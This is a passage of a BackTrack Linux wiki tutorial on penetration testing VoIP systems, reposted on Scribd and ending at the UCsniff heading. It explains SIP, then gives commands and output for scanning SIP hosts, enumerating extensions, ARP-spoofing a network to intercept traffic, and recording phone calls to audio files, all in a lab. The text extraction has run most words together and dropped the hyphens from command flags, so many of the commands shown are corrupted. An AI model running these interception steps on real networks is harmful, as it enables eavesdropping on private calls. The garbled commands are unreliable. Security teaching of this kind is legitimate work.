Scribd
Upload
426 views

Pentesting VOIP - BackTrack Linux

BT

Uploaded by

Jed Sig
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
426 views

Pentesting VOIP - BackTrack Linux

BT

Uploaded by

Jed Sig
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 40

7/12/2015

PentestingVOIPBackTrackLinux

PentestingVOIP
FromBackTrackLinux
ThisarticlewascontributedbyNightRang3r.
URL:http://www.backtrack.de/index.php?page=team#smtx
Twitter:http://twitter.com/#!/NightRang3r
Email:[email protected]

Contents
1PenetrationTestingVOIPwithBackTrack
2TypicalVoIPTopologies
2.1SelfHosted
2.2HostedServices
2.3OnlineSIPService
3SIPBasics
3.1SIPRequests/Methods
3.1.1AnExampleSIPINVITERequest:
3.2SIPResponses
3.2.1AnExampleSIPTryingResponse:
3.3SIPCallBetween2PhonesExample
4AttackVectors
5InformationGathering
5.1SMAP
5.1.1SMAPUsage:
5.1.2Scanningasinglehost:
5.1.3ScanningarangeofIPaddresses:
5.2SIPSAK
5.3SIPScan
5.3.1Sipscanusage:
5.3.2Scanningasubnet:
5.4SVMAP
5.4.1ScanninganIPrange:
5.4.2Enablingfingerprintingscanning
5.5ExtensionsEnumeration
5.5.1Svwar
5.5.1.1Usage:
5.5.1.2Example:
5.5.2Enumiax
6MonitoringTrafficandEavesdroppingPhonecalls
6.1ArpPoisoningusingArpspoof
6.2CapturingtrafficandEavesdroppingusingWireshark
6.3VoIPong
6.3.1Playingthefile:
6.4Vomit
6.5UCsniff
6.5.1MonitorModeUsage
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

1/40

7/12/2015

PentestingVOIPBackTrackLinux

6.5.2MITMLearningModeUsage
6.5.3MITMTargetMode
6.6Xplico
6.7CapturingSIPAuthenticationusingSIPDump
7AttackingAuthentication
7.1CrackingSIPDigestresponsehashes
7.1.1SIPCrackUsage:
7.1.2Dictionaryattack
7.1.2.1Creatingasixcharsnumericdictionary:
7.1.2.2CrackingtheDigestResponse:
7.1.3BruteForceattackusingJohnTheRipper
7.2BruteforcingSIPAccounts
8VLANHopping
8.1VoIPHopper
8.2ACE
9DenialOfService
9.1Inviteflood
9.2Rtpflood
9.3Iaxflood
9.4Teardown
10SpoofingCallerID
11AttackingVoIPUsingMetasploit
11.1MetasploitVoIPModules
11.1.1Auxiliaries
11.1.2Exploits
11.2ScanningSIPEnabledDevices
11.3EnumeratingSIPextensions/Usernames
11.4SpoofingCallerIDauxiliary
11.5ExploitingVoIPsystems
12ClosingWords
13AboutTheAuthor
14References

PenetrationTestingVOIPwithBackTrack

VoIPisanexcitingtechnologywhichprovidesmanybenefitsandcosteffectivesolutionsforcommunication.Moreandm
andenterprisebusinessesarereplacingtheiroldtraditionaltelephonysystemswithanIPbasedones.AVoIPbasedPBX
providemanyfeaturessuchas:MultipleExtensions,CallerID,Voicemail,IVRcapabilities,Recordingofconversations,
Usagewithhardwarebasedtelephonesorsoftwarebased(akasoftphones).NowdaystherearemanyvendorsforPBX,I
telephones,VoIPservicesandequipmentsuchas:CISCO,AVAYAandASTERISK,SNOM,THOMSONWithnewt
comesanewchallengeforboththedefensiveandoffensivesideofsecurity,Oneofthegreatdangersoftraditionalpho
wasthatitwassusceptibletoeavesdropping.Theoldschoolwaytoeavesdroponsomebodysphonelinewastophysic
connectasmalltransmitterwhichwasconnectedinsideoroutsidetheirpremisessomewherealongthephonecord.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

2/40

7/12/2015

PentestingVOIPBackTrackLinux

IPtelephonysystemsarealsosusceptibletoeavesdropping,doingsoinanIPenvironmentisalittlebitmoredifficulttoe
detectandrequiremoretheknowledgeandtherightsetoftools.Inthisarticlewewontdiscussaparticularvendorortec
wewilltakealookattheconceptsandthetoolsavailableforattackingVoIPavailableforusinBacktrackLinux.Them
thisarticleistopresentthetoolsandtheirpurposeinordertohelpyouchoosetherighttoolfortherightsituation.Wewi
somerealworldattackvectorsanddiscoverhowBackTrackcanassistuspentestingVoIPwewillalsoexaminesomeo
whichpresentinBackTrackandtheirusage.

TypicalVoIPTopologies
ThereareseveralwaysIPbasedtelephonycanbeimplemented,herearesomecommontopologiesandusage:

SelfHosted

APBX(i.e.Asterisk)isinstalledattheclientsiteandconnectedtoanISPortelephonyserviceproviderPSTNviaaSIPT
theVoIPtrafficflowsthroughadedicatedVlan.

VisiodiagrambyAmirAvraham

HostedServices

ThereisnoneedforaPBXatsite.Justaswitch,arouter,IPphonesandaconnectiontotheserviceproviderPBXviainte
IP/VPNconnection,eachphoneisconfiguredwithSIPaccountinformation.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

3/40

7/12/2015

PentestingVOIPBackTrackLinux

OnlineSIPService

Serviceslikesipme.meprovidesanapplicationforpcorsmartphonesandafreesipaccount,Offeringlowpriceforinter
callsandfreecallsbetweentheserviceusersbyassigningaponenumbertoeachsubscriber.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

4/40

7/12/2015

PentestingVOIPBackTrackLinux

SIPBasics

TheSIP(SessionInitiationProtocol)roleistosetup,terminateormodifyavoiceoravideocallwherethevoiceand/orv
arebeingcarriedbyaprotocollikeRTP(RealtimetransportProtocol).SIPisanapplicationlayerprotocolwhichusesU
transport(TCPandSCTPcanbeusedaswell).

SIPusuallyusesports5060TCPorUDPforunencryptedsignalingor5061forencryptedtransportationusingTL

SIPisanASCIIbasedprotocolwhichhassomesimilarelementslikeintheHTTPprotocolbyusingaRequest/Response
MuchlikeanHTTPrequestfromabrowseraSIPclientrequestismadeusingaSIPURIauseragentandamethod/reque
usesemaillikeaddressesformat:user/phone@domain/ipAtypicalSIPURIlookslike:
sip:[email protected],sip:[email protected],sip:[email protected]:5060

Accordingtotherequestmadebytheclientaresponsewillbereceivedwithastatusorerrorcode,thefollowingtablesde
availablerequestsandresponsesintheSIPprotocol.

SIPRequests/Methods
Request
INVITE
ACK
CANCEL
REGISTER
OPTIONS
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

Description
Usedtoinviteandaccounttoparticipateinacallsession.
AcknowledgeanINVITErequest.
Cancelapendingrequest.
RegisteruserwithaSIPserver.
Listsinformationaboutthecapabilitiesofacaller.
5/40

7/12/2015

PentestingVOIPBackTrackLinux

BYE

Terminatesasessionbetweentwousersinacall.
Indicatesthattherecipient(identifiedbytheRequestURI)

REFER

shouldcontactathirdpartyusingthecontactinformation
providedintherequest.
TheSUBSCRIBEmethodisusedtorequestcurrentstateand

SUBSCRIBE

stateupdatesfromaremote
node.
TheNOTIFYmethodisusedtonotifyaSIPnodethatanevent

NOTIFY

whichhasbeenrequestedbyanearlierSUBSCRIBEmethodhas
occurred.

AnExampleSIPINVITERequest:
INVITEsip:[email protected]/2.0
Via:SIP/2.0/UDP192.168.1.102;rport;branch=z9hG4bKvbxaoqar
MaxForwards:70
To:
From:"NightRanger";tag=eihgg
CallID:hfxsabthoymshub@backtrack
CSeq:649INVITE
Contact:
ContentType:application/sdp
Allow:INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported:replaces,norefersub,100rel
UserAgent:Twinkle/1.2
ContentLength:310

SIPResponses
Response

Description
Informationalresponses,Requestreceivedandbeing

1xx

processed.
SuccessfulresponsesTheactionwassuccessfullyreceived,

2xx
3xx

understood,andaccepted.
Redirectionresponses
RequestfailureresponsesTherequestcontainsbadsyntaxor

4xx

cannotbefulfilledattheserver.
ServerfailureresponsesTheserverfailedtofulfillan

5xx

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

apparentlyvalidrequest.
6/40

7/12/2015

PentestingVOIPBackTrackLinux

6xx

GlobalfailureresponsesTherequestcannotbefulfilledatany
server.

AnExampleSIPTryingResponse:

SIP/2.0100Trying
Via:SIP/2.0/UDP192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060
From:"NIghtRanger";tag=eihgg
To:
CallID:hfxsabthoymshub@backtrack
CSeq:650INVITE
UserAgent:AsteriskPBX
Allow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY
Supported:replaces
Contact:
ContentLength:0

SIPCallBetween2PhonesExample

Thecallingphonesendsaninvite.
Thecalledphonesendsbackaresponseof100(Trying).
Thecalledphonethenstartstoringandsendsaresponseof180(Ringing).
Whenthecallerpicksupthephonethecalledphonesendsaresponseof200(OK).
ThecallingphonesendsanACKresponse.
ConversationbeginsviaRTP.
WhenthecallerhangsupthephoneaBYErequestissent.
Thecallingphonerespondswith200(OK).

AttackVectors
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

7/40

7/12/2015

PentestingVOIPBackTrackLinux

BeforewegetstartedwiththetoolsletshavealookatsomecommonVoIPattackvectors:
InformationGathering,FootprintingandEnumeration.
MonitoringTrafficandeavesdroppingPhonecalls.
AttackingAuthentication.
VLANHopping.
DenialofService/Flooding.
SpoofingCallerID.

InordertotestthetoolsIhavesetupaTRIXBOXPBXSystemandcreated6extensions.Iwillbeusingtwosoftphones,
basedclientcalledTwinkleandthe2ndisaWindowsbasedclientcalledXLite.Iwillbeusingthelatestandgreatestrel
BacktrackLinuxwhichisR2.YoucanfindMostoftheVoIPattacktoolsinBacktrackunderthe/pentest/voip/direc

root@bt:~#cd/pentest/voip/
root@bt:/pentest/voip#

OryoucansimplynavigateusingtheKDEmenutotheBacktrackVoiceOverIPsubmenus:

InformationGathering

Thisphaseiswherewegatherinformationaboutthetopology,serversandclientstolearnasmuchinformationaswecan
launchasuccessfulattack.Whatweareinterestedinfindingislivehosts,PBXtypeandversion,VoIPservers/gateways,
(hardwareandsoftware)typesandversionsetcInsteadofenumeratingusernameswewillbeenumeratingSIPextens
takealookatsomeofthetoolswhichavailableinBacktracktohelpusfind,identifyandenumerateVoIPenableddevic
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

8/40

7/12/2015

PentestingVOIPBackTrackLinux

SMAP

BacktrackincludesagreattoolcalledSMAPwhichisasimplescannerforSIPenableddevicesSMAPsendsoffvarious
requestsawaitingresponsesfromSIPenabledDSLrouter,proxiesanduseragents.
ItcouldbeconsideredamashupofNMAPandsipsak.
SMAPUsage:

root@bt:/pentest/voip/smap#./smap
smap0.6.0http://www.wormulon.net/
usage:smap[Options]
h:thishelp
d:increasedebugging
o:enablefingerprinting
O:enablemoreverbosefingerprinting
l:fingerprintlearningmode
t:TCPtransport
u:UDPtransport(default
P0:Treatallhostsasonlineskiphostdiscovery
p:destinationport
r:messagespersecondratelimit
D:SIPdomaintousewithoutleadingsip:
w:timeoutinmsec

Scanningasinglehost:

root@bt:/pentest/voip/smap#./smap192.168.1.104
smap0.6.0http://www.wormulon.net/
192.168.1.104:ICMPreachable,SIPenabled
1hostscanned,1ICMPreachable,1SIPenabled(100.0%)

ScanningarangeofIPaddresses:

root@bt:/pentest/voip/smap#./smap192.168.1.130/24
smap0.6.0http://www.wormulon.net/
192.168.1.20:ICMPreachable,SIPenabled
192.168.1.22:ICMPreachable,SIPenabled
192.168.1.0:ICMPunreachable,SIPdisabled
192.168.1.1:ICMPunreachable,SIPdisabled
192.168.1.2:ICMPunreachable,SIPdisabled
192.168.1.3:ICMPunreachable,SIPdisabled
EDIT
192.168.1.250:ICMPunreachable,SIPdisabled
192.168.1.251:ICMPunreachable,SIPdisabled
192.168.1.252:ICMPunreachable,SIPdisabled
192.168.1.253:ICMPunreachable,SIPdisabled
192.168.1.254:ICMPunreachable,SIPdisabled
192.168.1.255:ICMPunreachable,SIPdisabled
256hostsscanned,7ICMPreachable,2SIPenabled(0.8%)

NowthatwehaveidentifiedsipenabledhostswecanuseSMAPtofingerprinttheserver/clienttypeandversion:
root@bt:/pentest/voip/smap#./smapO192.168.1.104
smap0.6.0http://www.wormulon.net/

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

9/40

7/12/2015

PentestingVOIPBackTrackLinux

192.168.1.104:ICMPreachable,SIPenabled
bestguess(70%sure)fingerprint:
AsteriskPBXSVNtrunkr56579
UserAgent:AsteriskPBX
1hostscanned,1ICMPreachable,1SIPenabled(100.0%)

IncaseSMAPcouldnotfingerprintourhostweusethelargumenttoputitinlearningmodetoprovidesomeusefulinfo
root@bt:/pentest/voip/smap#./smapl192.168.1.104
smap0.6.0http://www.wormulon.net/
NOTICE:test_accept:"Accept:application/sdp"
NOTICE:test_allow:"Allow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY"
NOTICE:test_supported:"Supported:replaces"
NOTICE:test_via:transportcapitalization:2
NOTICE:test_via:"branch;alias;received;rport"
NOTICE:test_via:Pleaseaddnewcmpstr
NOTICE:test_via:transportcapitalization:2
192.168.1.104:ICMPreachable,SIPenabled
bestguess(70%sure)fingerprint:
AsteriskPBXSVNtrunkr56579
FINGERPRINTinformation:
newmethod=501
accept_class=2
allow_class=201
supported_class=8
via_class=2
hoe_class=ignore
options=200
brokenfromto=404
prack=481
ping=501
invite=200
UserAgent:AsteriskPBX
1hostscanned,1ICMPreachable,1SIPenabled(100.0%)

AnotherusefulfeatureofSMAPisthedargumentwhichenablesdebugoutputforverbositytrytousetheoalongwith
thefingerprintingprocessindetails.
root@bt:/pentest/voip/smap#./smapd192.168.1.104
smap0.6.0http://www.wormulon.net/
DEBUG:localIP:212.235.66.182
DEBUG:localIP:212.235.66.182
DEBUG:bind()successful
DEBUG:RAWsocketopen
DEBUG:moving1fromS_STARTtoS_PING
DEBUG:ICMPerrorEchoReply
DEBUG:192.168.1.104/1request:SIPOPTIONSrequest(valid)
DEBUG:responsebelongstotask1(192.168.1.104)
DEBUG:ACK:ACKsip:localhostSIP/2.0
Via:SIP/2.0/UDP212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060
From:;tag=6b9ae50e67345d3b
To:;tag=as14262fec
CallID:[email protected]
CSeq:23915ACK
ContentLength:0
UserAgent:smap0.6.0
endofACK
192.168.1.104:ICMPreachable,SIPenabled
DEBUG:destroyingtask1
1hostscanned,1ICMPreachable,1SIPenabled(100.0%)

SIPSAK

SIPSAKisusedfortestingSIPenabledapplicationsanddevicesusingtheOPTIONrequestmethodonly.Wecanuseitt
fingerprintandenumeration.Youwontfindsipsakinthe/pentest/voip/directoryyoucanexecuteitfromanylocation
typingsipsak.

root@bt:~#sipsak
sipsak0.9.6byNilsOhlmeier

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

10/40

7/12/2015

PentestingVOIPBackTrackLinux

Copyright(C)20022004FhGFokus
Copyright(C)20042005NilsOhlmeier
[email protected]
shoot:sipsak[fFILE][L]sSIPURI
trace:sipsakTsSIPURI
usrloc:sipsakU[I|M][bNUMBER][eNUMBER][xNUMBER][zNUMBER]sSIPURI
usrloc:sipsakI|M[bNUMBER][eNUMBER]sSIPURI
usrloc:sipsakU[CSIPURI][xNUMBER]sSIPURI
message:sipsakM[BSTRING][OSTRING][cSIPURI]sSIPURI
flood:sipsakF[eNUMBER]sSIPURI
random:sipsakR[tNUMBER]sSIPURI
additionalparameterineverymode:
[aPASSWORD][d][i][HHOSTNAME][lPORT][mNUMBER][n][N]
[rPORT][v][V][w]
hdisplaysthishelpmessage
Vprintsversionstringonly
fFILEthefilewhichcontainstheSIPmessagetosend
useforstandardinput
LdeactivateCR(\r)insertioninfiles
sSIPURIthedestinationserveruriinform
sip:[user@]servername[:port]
Tactivatesthetraceroutemode
Uactivatestheusrlocmode
Isimulatesasuccessfulcallswithitself
Msendsmessagestoitself
CSIPURIusethegivenuriasContactinREGISTER
bNUMBERthestartingnumberappendixtotheusername(default:0)
eNUMBERtheendingnumeroftheappendixtotheusername
oNUMBERsleepnumbermsbeforesendingnextrequest
xNUMBERtheexpiresheaderfieldvalue(default:15)
zNUMBERactivatesrandomlyremovingofuserbindings
Factivatesthefloodmode
Ractivatestherandommodues(dangerous)
tNUMBERthemaximumnumberoftrashedcharacterinrandommode
(default:requestlength)
lPORTthelocalporttouse(default:any)
rPORTtheremoteporttouse(default:5060)
pHOSTNAMErequesttarget(outboundproxy)
HHOSTNAMEoverwritesthelocalhostnameinallheaders
mNUMBERthevalueforthemaxforwardsheaderfield
nuseFQDNinsteadofIPsintheViaLine
ideactivatetheinsertionofaViaLine
aPASSWORDpasswordforauthentication
(ifomittedpassword="")
uSTRINGAuthenticationusername
dignoreredirects
veachvproducesmoreverbosity(max.3)
wextractIPfromthewarninginreply
gSTRINGreplacementforaspecialmarkinthemessage
Gactivatesreplacementofvariables
NreturnsexitcodesNagioscompliant
qSTRINGsearchforaRegExpinrepliesandreturnerror
onfailure
WNUMBERreturnNagioswarningifretrans>number
BSTRINGsendamessagewithstringasbody
OSTRINGContentDispositionvalue
PNUMBERNumberofprocessestostart
ANUMBERnumberoftestrunsandprintjusttimings
Susesameportforreceivingandsending
cSIPURIusethegivenuriasFrominMESSAGE
DNUMBERtimeoutmultiplierforINVITEtransactions
andreliabletransports(default:64)
ESTRINGspecifytransporttobeused
jSTRINGaddsadditionalheaderstotherequest

HereisanexampleforusingsipsaktofingerprintasipenableddeviceWecanseeintheresultthatthedevicewequeried
AudiocodesMP114FXSgateway.
root@bt:~#sipsakvvssip:192.168.1.221
messagereceived:
SIP/2.0200OK
Via:SIP/2.0/UDP127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;alias
From:sip:[email protected]:51601;tag=97ac9e5
To:sip:192.168.1.221;tag=1c1785761661
CallID:[email protected]
CSeq:1OPTIONS
Contact:
Supported:em,100rel,timer,replaces,path,resourcepriority
Allow:REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATE
Server:AudiocodesSipGatewayMP114FXS/v.5.40A.040.005
XResources:telchs=4/0;mediachs=0/0
Accept:application/sdp,application/simplemessagesummary,message/sipfrag
ContentType:application/sdp
ContentLength:343
v=0
o=AudiocodesGW17857639801785763858INIP4192.168.1.221
s=PhoneCall
c=INIP4192.168.1.221
t=00
m=audio6000RTP/AVP1880127
a=rtpmap:18G729/8000
a=fmtp:18annexb=no
a=rtpmap:8PCMA/8000
a=rtpmap:0PCMU/8000
a=rtpmap:127telephoneevent/8000
a=fmtp:127015
a=ptime:20
a=sendrecv
a=rtcp:6001INIP4192.168.1.221

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

11/40

7/12/2015

PentestingVOIPBackTrackLinux

**replyreceivedafter67.923ms**
SIP/2.0200OK
finalreceived

SIPScan
Sipscanisasimplescannerforsipenabledhostsitcanscanasinglehostoranentiresubnet.
Sipscanusage:

root@bt:/pentest/voip/sipscan#./sipscanhelp
./sipscanversion[unknown]callingGetopt::Std::getopts(version1.05),
runningunderPerlversion5.10.0.
Usage:sipscan[options]
vBeverbose.
iip|ifInterface/IPforSIPheaders(default:IPfromppp0)
pportremoteporttoscan.(default:5060)
lportlocaloriginofpackets.(default:5060)
dn[p]Waitnmsaftereachsentpacket(default:50ms)orif'p'is
given,sendnpacketspersecond(default:20)
wnWaitnmsforremaininganswers(default:2000ms)
Networkspeccontainsthewildcard*orrangesnm.

Scanningasubnet:

root@bt:/pentest/voip/sipscan#./sipscanieth0192.168.1.1254
192.168.1.20:GrandstreamHT502V1.2A1.0.1.35
192.168.1.21:GrandstreamHT502V1.2A1.0.1.35
192.168.1.22:AsteriskPBX
192.168.1.104:AsteriskPBX
192.168.1.128:FreeSWITCHmod_sofia/1.0.trunk16055
192.168.1.174:GrandstreamHT502V1.2A1.0.1.35
192.168.1.175:AsteriskPBX1.6.0.9samyr27
192.168.1.219:"ExelmindCallControlSwitch(CCS)"
192.168.1.248:MailVisionHostLynx/2.1'GA'

SVMAP

SVMAPisapartofasuiteoftoolscalledSIPViciousanditsmyfavoritescannerofchoiceItcanbeusedtoscanidentif
fingerprintasingleIPorarangeofIPaddresses.Svmapallowsspecifyingtherequestmethodwhichisbeingusedforsca
defaultmethodisOPTIONS,itoffersdebugandverbosityoptionsandevenallowsscanningtheSRVrecordsforSIPon
destinationdomain.Youcanusethe./svmaphinordertoviewalltheavailablearguments

root@bt:/pentest/voip/sipvicious#./svmap.py
Usage:svmap.py[options]host1host2hostrange
examples:
svmap.py10.0.0.110.0.0.255\
>172.16.131.1sipvicious.org/2210.0.1.1/24\
>1.1.1.1201.1.220.*4.1.*.*
svmap.pyssession1randomize10.0.0.1/8
svmap.pyresumesession1v
svmap.pyp5060506210.0.0.320mINVITE

ScanninganIPrange:
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

12/40

7/12/2015

PentestingVOIPBackTrackLinux

root@bt:/pentest/voip/sipvicious#./svmap.py192.168.1.1254
|SIPDevice|UserAgent|Fingerprint|

|192.168.1.104:5060|AsteriskPBX|disabled|
|192.168.1.103:5060|Twinkle/1.4.2|disabled|

Enablingfingerprintingscanning

root@bt:/pentest/voip/sipvicious#./svmap.py192.168.1.1254fp

ExtensionsEnumeration

ExtensionenumerationcanaidanattackerbyfindingvalidextensionsonaVoIPsystemwhichlatercanleadtoabrutefo
ontheSIPaccounts.ExtensionenumerationworksbyexaminingerrorsreturnedbyasiprequestsmethodslikeREGISTE
OPTIONSandINVITE
Svwar

Svwarisalsoatoolfromthesipvicioussuiteallowstoenumerateextensionsbyusingarangeofextensionsorusingadic
svwarsupportsalltheofthethreeextensionenumerationmethodsasmentionedabove,thedefaultmethodforenumeratio
REGISTER.
Usage:

root@bt:/pentest/voip/sipvicious#./svwar.py
Usage:svwar.py[options]target
examples:
svwar.pye10099910.0.0.1
svwar.pyddictionary.txt10.0.0.2

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

13/40

7/12/2015

PentestingVOIPBackTrackLinux

Example:

root@bt:/pentest/voip/sipvicious#./svwar.pye100400192.168.1.104
|Extension|Authentication|

|201|reqauth|
|200|reqauth|
|203|reqauth|
|202|reqauth|
|303|reqauth|
|305|reqauth|

SvwarhasidentifiedalltheextensionsIvecreatedonmyTrixboxserver.Youcanspecifyanothersipmethodbyusingth
argument,youcanalsoaddtvorvvforverbosity.
root@bt:/pentest/voip/sipvicious#./svwar.pye100400192.168.1.104mINVITEv
INFO:TakeASip:tryingtogetselfip..mighttakeawhile
INFO:root:startyourengines
INFO:TakeASip:OkSIPdevicefound
INFO:TakeASip:extension'200'existsrequiresauthentication
INFO:TakeASip:extension'201'existsrequiresauthentication
Edit
INFO:TakeASip:extension'203'existsrequiresauthentication
INFO:TakeASip:extension'303'existsrequiresauthentication
INFO:TakeASip:extension'303'existsrequiresauthentication
INFO:TakeASip:extension'305'existsrequiresauthentication
INFO:root:wehave6extensions
|Extension|Authentication|

|201|reqauth|
|200|reqauth|
|203|reqauth|
|202|reqauth|
|303|reqauth|
|305|reqauth|
INFO:root:Totaltime:0:00:21.944731

Enumiax

EnumiaxisusedtoenumerateAsteriskExchangeprotocolusernames.ItallowsforadictionaryattackorasequentialUse
Guessing

root@bt:/pentest/voip/enumiax#./enumiax
enumIAX1.0
DustinD.Trammell
Usage:enumiax[options]target
options:
dDictionaryattackusingfile
iIntervalforautosave(#ofoperations,default1000)
m#Minimumusernamelength(incharacters)
M#Maximumusernamelength(incharacters)
r#Ratelimitcalls(inmicroseconds)
sReadsessionstatefromstatefile
vIncreaseverbosity(repeatforadditionalverbosity)
VPrintversioninformationandexit
hPrinthelp/usageinformationandexit
root@bt:/pentest/voip/enumiax#./enumiaxvm3M3192.168.1.104
enumIAX1.0
DustinD.Trammell
TargetAquired:192.168.1.104
Connectingto192.168.1.104viaudponport4569...
Startingenumprocessat:SatFeb513:04:182011
Nowworkingon3characterusernames...
#################################
Tryingusername:"000"
#################################
Tryingusername:"001"
#################################
Tryingusername:"002"
#################################
Tryingusername:"003"
#################################
Tryingusername:"004"
#################################
Tryingusername:"005"
#################################

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

14/40

7/12/2015

PentestingVOIPBackTrackLinux

Tryingusername:"006"
#################################
Tryingusername:"007"
#################################
Tryingusername:"008"
#################################
...
root@bt:/pentest/voip/enumiax#./enumiaxddictv192.168.1.104
enumIAX1.0
DustinD.Trammell
TargetAquired:192.168.1.104
Connectingto192.168.1.104viaudponport4569...
Startingenumprocessat:SatFeb513:02:392011
#################################
Tryingusername:"guest"
#################################
Tryingusername:"iaxtel"
#################################
Tryingusername:"iaxtel2"
#################################
Tryingusername:"100"
#################################
Tryingusername:"101"
#################################
Tryingusername:"200"
#################################
Tryingusername:"201"
#################################
Tryingusername:"202"
#################################
Tryingusername:"203"
Endofdictionaryfilereached,exiting.

MonitoringTrafficandEavesdroppingPhonecalls

MonitoringVoIPtrafficcanallowanattackercaptureSIPrequestsandRTPdatasentfromclientstoserverandback.Itc
twoattackvectors:
CapturingSIPauthentication(wewilllaterdiscussthistopicintheattackingauthenticationsection).
Eavesdroppingusersphonecalls.
Fordemonstrationpurposeswewillusethefollowingscenario:

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

15/40

7/12/2015

PentestingVOIPBackTrackLinux

ForthisattackvectorwewillneedtoperformaManinTheMiddleAttackwhichwillrequirethefollowingsteps:
Arppoisoning/spoofing
Sniffingtraffic
DecodingRTPdatatoanaudiofile.

ArpPoisoningusingArpspoof

Beforewecanbegintosnifftrafficwewillneedtoarppoisonourswitch/gateway,wellbeusingatoolcalledArpspoof
locatedin/usr/sbin/ArpspooffolderinBacktrack,infactyoucanjustinvokeitfromanywherebytyping:arpspoof
canusearpspoofwewillneedtoenableIPforwarding:

root@bt:~#echo1>/proc/sys/net/ipv4/ip_forward

Arpspoofsyntaxshouldlookasfollows:
root@bt:~#arpspoof
Version:2.4
Usage:arpspoof[iinterface][ttarget]host

ForasuccessfulMITMattackwewillneedtospoofbothways:
arpspooftvictimgateway
arpspooftgatewayvictim

WewillletourArppoisoningruninthebackgroundwhileperformingacaptureusingWireshark.

CapturingtrafficandEavesdroppingusingWireshark
NowletsfireupWiresharktocapturesometraffic.WewillusethefollowingWiresharkcapturefilter:

notbroadcastandnotmulticastandhost192.168.1.118

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

16/40

7/12/2015

PentestingVOIPBackTrackLinux

NowletsstartcapturingsometrafficWhilesniffingfortrafficUserBhaslaunchedtheXLitesoftphoneonhisdes
computeranddialedtouserAextension200.

Wiresharkhascapturedsometraffic,afterawhileIhavestoppedthecaptureprocessandsavedthesessionsintoafilecal
http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

17/40

7/12/2015

PentestingVOIPBackTrackLinux

sip.pcap.

WecanseethatwehavecapturedtheSIPtrafficbutforthissectionwearemoreinterestedintheRTPtrafficbecauseitc
actualconversationdata.

WiresharkhasaprettycoolfeaturetodecodecapturedVoIPcallsdataintoplayableaudioformatYoucanfindthisfeatur
Statistics>VoIPCallsmenu.

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

18/40

7/12/2015

PentestingVOIPBackTrackLinux

VoIPong

VoIPongisautilitywhichdetectsallVoiceoverIPcallsonapipeline,andforthosewhichareG711encoded,dumpsact
conversationtoseparatewavefiles.ItsupportsSIP,H323,Cisco'sSkinnyClientProtocol,RTPandRTCP.VoIPongislo
Backtrack/pentest/voip/voipongdirectoryBeforewecanuseVoIPongwewillneedtomakesomechangestothevoipo
file:

root@bt:/pentest/voip/voipong#nanoetc/voipong.conf
soxpath=/usr/bin/sox
networksfile=/pentest/voip/voipong/etc/voipongnets
outdir=/pentest/voip/voipong/output/
device=eth0#yournetworkinterfacecardname

NowwecanstartVoIPongtocapturesomeVoIPconversations
root@bt:/pentest/voip/voipong#./voipongcetc/voipong.confd4f

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

19/40

7/12/2015

PentestingVOIPBackTrackLinux

OnceVoIPongdetectsaphonecallitwillstartcaptureitonceitfinishVoIPongwillstopthecaptureprocessandwillren
playablewavefile.Allconversationwillbesavedintothe/pentest/voip/voipong/outputfolder

Playingthefile:

Vomit

VomitconvertsaCiscoIPphoneRTPconversationintoawavefilethatcanbeplayedwithordinarysoundplayers.Vom
tcpdumpoutputfile.InordertogetvomitupandrunningwewillneedtodownloadandinstallwaveplayGetithere:
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay20010924.tar.gz.5731.html

root@bt:~#tarxzvfwaveplay20010924.tar.gz

http://www.backtracklinux.org/wiki/index.php/Pentesting_VOIP

20/40

7/12/2015

PentestingVOIPBackTrackLinux

waveplay20010924/
waveplay20010924/Makefile
waveplay20010924/waveplay.c
waveplay20010924/waveplay.ja.1
waveplay20010924/wavefmt.h
waveplay20010924/README
waveplay20010924/waveplay.1
waveplay20010924/README.jp
root@bt:~#cdwaveplay20010924
root@bt:~/waveplay20010924#make
cccowaveplay.owaveplay.c
ccwaveplay.oowaveplay
root@bt:~/waveplay20010924#cpwaveplay/usr/bin/
root@bt:/pentest/voip/vomit#./vomitrsip.dump|waveplayS8000B16C1

UCsniff

